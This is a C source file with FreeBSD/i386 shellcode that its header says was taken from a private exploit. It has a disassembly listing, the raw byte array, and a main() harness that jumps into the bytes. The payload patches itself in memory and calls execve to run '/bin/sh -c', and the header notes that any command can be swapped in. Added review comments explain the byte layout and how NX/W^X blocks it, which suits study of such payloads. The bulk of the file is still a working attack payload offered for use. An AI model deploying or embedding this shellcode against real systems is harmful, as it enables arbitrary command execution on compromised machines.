/*
	FreeBSD Shellcode
	ripped from a private exploit :)
	
	jmp    0x37
	pop    %esi
	xor    %eax,%eax
	mov    %al,0xfffffffa(%esi)
	mov    %eax,0xfffffff5(%esi)
	mov    %esi,(%esi)
	mov    %esi,0x4(%esi)
	mov    %esi,0x8(%esi)
	addl   $0x10,(%esi)
	addl   $0x18,0x4(%esi)
	addl   $0x1b,0x8(%esi)
	mov    %eax,0xc(%esi)
	mov    %al,0x17(%esi)
	mov    %al,0x1a(%esi)
	mov    %al,0x1d(%esi)
	push   %eax
	push   %esi
	pushl  (%esi)
	mov    $0x3b,%al
	push   %eax
	nop
	lcall  $0x707,$0x1010101
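	call   0xc4ffffff
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	add    (%edx),%al
	  (Note on the listing: the call operand above is printed raw. The bytes
	   e8 c4 ff ff ff encode a relative call of -0x3c, i.e. back to the
	   "pop %esi" near the top. The eight "add (%edx),%al" lines are not
	   instructions; they are the sixteen 0x02 filler bytes that follow the
	   call, decoded as code by the disassembler.)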
	.string "/bin/sh.-c.sh"
      Replace .sh with .anycommand
*/

/*
 * code[] -- raw 32-bit x86 machine code stored as a C string, matching the
 * disassembly in the header comment byte for byte.
 *
 * Layout (offsets from the start of the array):
 *   0x00        jmp forward to the call at 0x39
 *   0x02..0x38  body: pop %esi, patch-ups, pushes, lcall
 *   0x39        call back to 0x02; the pushed return address (0x3e) is what
 *               pop %esi picks up, so %esi points at the filler area
 *   0x3e..0x4d  sixteen 0x02 filler bytes, overwritten at run time with three
 *               pointers (%esi+0x10, %esi+0x18, %esi+0x1b) and a zero word
 *   0x4e..      the text "/bin/sh.-c.sh"; the '.' bytes at %esi+0x17 and
 *               %esi+0x1a are overwritten with zero, splitting it into
 *               "/bin/sh", "-c" and "sh"
 *
 * The body also zeroes the lcall operand bytes (stored as 01 01 01 01 07 07),
 * turning the instruction into lcall $7,$0, and loads 0x3b into %al before
 * it. On FreeBSD/i386 that is the system-call gate with syscall 59 (execve).
 *
 * Review notes:
 *  - The stored bytes contain no 0x00; every zero the code needs is written
 *    at run time. That is why strlen() on this array reports the full size.
 *  - Because the code rewrites itself and its data in place, it only runs
 *    from memory that is writable and executable at once; a W^X / NX policy
 *    on data pages stops it before the first patched store completes a run.
 *  - The command text at the tail is stored unencoded in the byte stream.
 */
char code[]=
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76" /* jmp; pop %esi; clear %eax; zero lcall operand; begin pointer slots */
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b" /* finish slots; add 0x10 / 0x18 / 0x1b to the three pointers */
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff" /* zero 4th slot and the separator bytes; push %eax, %esi, (%esi) */
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" /* %al = 0x3b; push; nop; lcall with placeholder operand; call ... */
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" /* ... rel32 tail of the call, then filler for the pointer table */
"\x02\x02\x02/bin/sh.-c.sh"; /* last filler bytes, then the '.'-separated command text */

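/*
 * Test harness: prints the length of code[] and then calls the array as if
 * it were a function.
 *
 * Returns 0 if the call through f ever returns.
 *
 * Review notes:
 *  - strlen() yields a size_t; the original passed it straight to "%d",
 *    which is a format/argument mismatch. The value is converted to int
 *    here so the format string stays unchanged.
 *  - strlen() only measures the whole array because the stored bytes
 *    contain no 0x00 before the terminator.
 *  - Converting a data pointer to a function pointer is not defined by
 *    ISO C. Where data pages are mapped non-executable, the call below is
 *    expected to fault instead of running the bytes -- presumably this
 *    harness predates such defaults; confirm on the target platform.
 *  - NOTE(review): this file declares neither printf nor strlen; it relies
 *    on implicit declarations and should include <stdio.h> and <string.h>.
 */
int main(void)
{
  int (*f)();

  /* Reinterpret the byte array as a function taking no checked arguments. */
  f = (int (*)()) code;
  printf("FreeBSD custom shellcode, %d bytes\n", (int)strlen(code));

  /* Transfer control into code[]; the result, if any, is ignored. */
  (void)(*f)();
  return 0;
}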